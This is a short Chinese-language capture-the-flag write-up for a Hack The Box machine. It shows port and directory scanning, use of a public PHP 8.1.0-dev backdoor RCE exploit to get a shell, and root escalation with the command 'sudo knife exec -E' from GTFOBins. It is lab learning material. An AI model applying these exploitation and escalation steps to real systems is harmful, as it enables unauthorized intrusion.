URL : https://app.hackthebox.eu/machines/347
IP : 10.10.69.238
Recon
- 掃 Port
rustscan -a 10.10.69.238 -r 1-65535
- 有開 80 跟 443觀察 Wappalyzer-
Apache 2.4.41 - PHP8.1.0
掃目錄- python3 dirsearch.py -u http://10.10.10.242/ - 看起來沒有東西 QQ
Exploit
- 找到 php 8.1.0 有 RCE 漏洞https://github.com/flast101/php-8.1.0-dev-backdoor-rce
git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce執行起來-
- 就成功拿到 Shell ㄌ也可以執行另外一個 reverse shell 版本-
取得 user.txt-
提權
- 起手式
sudo -l
- 發現我們可以用
sudo knifeGTFOBins 尋找刀子的 sudo 提權-sudo knife exec -E 'exec "/bin/sh"' - 就提權成功ㄌ
取得 Root Flag- 
心得
這題提醒我們,還是需要優先確認各種服務的版本號。